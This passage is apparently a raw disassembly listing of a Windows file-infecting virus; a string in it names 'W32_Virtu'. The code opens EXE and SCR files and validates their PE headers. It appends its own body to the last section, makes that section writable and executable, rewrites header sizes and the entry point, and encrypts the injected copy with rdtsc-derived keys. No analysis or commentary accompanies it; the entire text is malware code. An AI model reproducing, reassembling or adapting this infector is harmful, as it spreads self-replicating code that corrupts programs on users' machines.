add eax, [ebp+40106Dh]
loc_3100910B: ; CODE XREF: sub_310090F1+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_310090F1 endp
; =============== S U B R O U T I N E =======================================
sub_31009136 proc near ; CODE XREF: sub_31009215:loc_31009264�p
; sub_31009215+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3100913B: ; CODE XREF: sub_31009136+23�j
jecxz short locret_31009172
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_31009172
cmp dword ptr [edx+0Ch], 1
jb short loc_3100913B
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_31009172: ; CODE XREF: sub_31009136:loc_3100913B�j
; sub_31009136+1D�j ...
retn
sub_31009136 endp
; =============== S U B R O U T I N E =======================================
sub_31009173 proc near ; CODE XREF: UPX2:310091FF�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_31009173 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_31009180: ; CODE XREF: UPX2:310091A1�j
mov ecx, edi
jmp short loc_3100918F
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3100918B: ; CODE XREF: UPX2:3100919D�j
mov ebx, edi
xor ecx, ecx
loc_3100918F: ; CODE XREF: UPX2:31009182�j
; UPX2:310091A5�j
lodsb
cmp al, 61h
jb short loc_3100919A
cmp al, 7Ah
ja short loc_3100919A
sub al, 20h
loc_3100919A: ; CODE XREF: UPX2:31009192�j
; UPX2:31009196�j
stosb
cmp al, 5Ch
jz short loc_3100918B
cmp al, 2Eh
jz short loc_31009180
cmp al, 0
jnz short loc_3100918F
jecxz short locret_31009172
mov eax, [ecx]
cmp eax, 455845h
jz short loc_310091BD
cmp eax, 524353h
jnz locret_310090F0
loc_310091BD: ; CODE XREF: UPX2:310091B0�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_310090F0
cmp eax, 4E554357h
jz locret_310090F0
cmp eax, 32334357h
jz locret_310090F0
cmp eax, 4F545350h
jz locret_310090F0
xor ebx, ebx
call sub_3100901F
jz locret_310090F0
xor edx, edx
call sub_31009215
call sub_31009173
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_31009552
; =============== S U B R O U T I N E =======================================
sub_31009215 proc near ; CODE XREF: UPX2:310091FA�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_31009552
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_31009552
test dword ptr [ebx+16h], 2000h
jnz loc_31009552
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_31009552
jecxz short loc_31009264
cmp ecx, 101h
jbe loc_31009552
loc_31009264: ; CODE XREF: sub_31009215+41�j
call sub_31009136
jb loc_31009552
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31007D6E
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3100928E: ; CODE XREF: sub_31009215+92�j
push 20h
dec cl
pop eax
js short loc_310092A9
call sub_31007D6E
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3100928E
; ---------------------------------------------------------------------------
loc_310092A9: ; CODE XREF: sub_31009215+7E�j
; sub_31009215+CD�j ...
push 6
pop ecx
loc_310092AF: ; CODE XREF: sub_31009215+B8�j
push 6
pop eax
call sub_31007D6E
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_310092AF
test dword ptr [ebp+403431h], 8
jnz short loc_310092E4
cmp byte ptr [ebp+40342Bh], 1
jz short loc_310092A9
loc_310092E4: ; CODE XREF: sub_31009215+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3100930B
cmp byte ptr [ebp+403429h], 5
jz short loc_310092A9
cmp byte ptr [ebp+40342Ah], 5
jz short loc_310092A9
cmp byte ptr [ebp+40342Bh], 5
jz short loc_310092A9
loc_3100930B: ; CODE XREF: sub_31009215+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31009320
cmp byte ptr [ebp+403429h], 2
ja short loc_310092A9
loc_31009320: ; CODE XREF: sub_31009215+100�j
and dword ptr [ebp+4039AEh], 0
call loc_310087BB
call sub_310090F1
call sub_3100955B
mov ebx, [ebp+403976h]
call sub_3100901F
jz loc_31009552
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_31009136
jb loc_31009552
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31009388
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_31009388: ; CODE XREF: sub_31009215+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3100939C
rep movsb
loc_3100939C: ; CODE XREF: sub_31009215+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_31009454
push dword ptr [ebx+28h]
call sub_31008523
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_31009454
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_310093D9
xor ecx, ecx
loc_310093D9: ; CODE XREF: sub_31009215+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_31009440
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_31009419
neg dword ptr [eax]
loc_31009419: ; CODE XREF: sub_31009215+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_31009437
neg dword ptr [eax]
loc_31009437: ; CODE XREF: sub_31009215+21E�j
push ecx
call sub_310090F1
pop ecx
jmp short loc_3100944C
; ---------------------------------------------------------------------------
loc_31009440: ; CODE XREF: sub_31009215+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3100944C: ; CODE XREF: sub_31009215+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_31009454: ; CODE XREF: sub_31009215+191�j
; sub_31009215+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3100946D
imul edx, 12345678h
loc_3100946D: ; CODE XREF: sub_31009215+250�j
mov [eax-1], dl
call near ptr dword_31007428+19h
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3100949E
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3100949E: ; CODE XREF: sub_31009215+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_310094C3
push edx
call sub_31008DE9
pop edx
loc_310094C3: ; CODE XREF: sub_31009215+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_310094CE
mov [ebx+28h], ecx
loc_310094CE: ; CODE XREF: sub_31009215+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_310094DF
mov [edx+8], ecx
loc_310094DF: ; CODE XREF: sub_31009215+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_31009510
add ecx, [ebp+40106Dh]
loc_31009510: ; CODE XREF: sub_31009215+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_31009532
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_31009532
mov dh, [ebp+403430h]
loc_31009532: ; CODE XREF: sub_31009215+307�j
; sub_31009215+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_31009549
loc_3100953E: ; CODE XREF: sub_31009215+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3100953E
jmp short loc_31009552
; ---------------------------------------------------------------------------
loc_31009549: ; CODE XREF: sub_31009215+327�j
; sub_31009215+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_31009549
loc_31009552: ; CODE XREF: UPX2:31009210�j
; sub_31009215+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_31009215 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3100955B proc near ; CODE XREF: sub_31009215+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_310090F0
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_31009574: ; CODE XREF: sub_3100901F+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3100959C: ; CODE XREF: sub_3100901F+6B�j
; sub_3100901F+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_310095A8: ; CODE XREF: sub_3100901F+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3100955B endp
; ---------------------------------------------------------------------------
db 0E8h
align 8
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 7050603h, 0FD950201h
dd 5E2E2D58h, 119415FFh, 5B900100h, 59E8h, 24648B00h, 4EBB808h
dd 0FAEB0000h, 18A16764h, 30408B00h, 240B60Fh, 7500F883h
dd 0E83Ch, 815D0000h, 20EDh, 34h dup(0)
dd 47000000h, 0AD7C809Bh, 317C8308h, 0A07C9103h, 7C80ADh
dd 2 dup(0)
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 0EC7C80C0h, 3C7C80E7h
dd 777C8115h, 457C810Ah, 0A17C831Ch, 0FF7C80B6h, 0CA7C8608h
dd 0DA7C835Dh, 0DE7C8111h, 777C812Ah, 57C801Dh, 767C80B9h
dd 0E17C80BBh, 0E57C8309h, 587C863Dh, 827C863Fh, 0B87C8127h
dd 427C831Ch, 1C7C8024h, 747C810Bh, 517C80B9h, 877C809Ah
dd 607C810Dh, 827C90D4h, 547C90D6h, 697C90D7h, 937C90D7h
dd 557C90D7h, 0FD7C90DCh, 907C90DCh, 0B67C90DDh, 327C90DEh
dd 0C67C90EAh, 7C9130h, 15h dup(0)
dd 380036h, 310098D8h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 8100h, 0Ch dup(0)
dd 727F00h, 31h, 18F2h dup(0)
UPX2 ends
; Section 4. (virtual address 00010000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00010000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31010000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start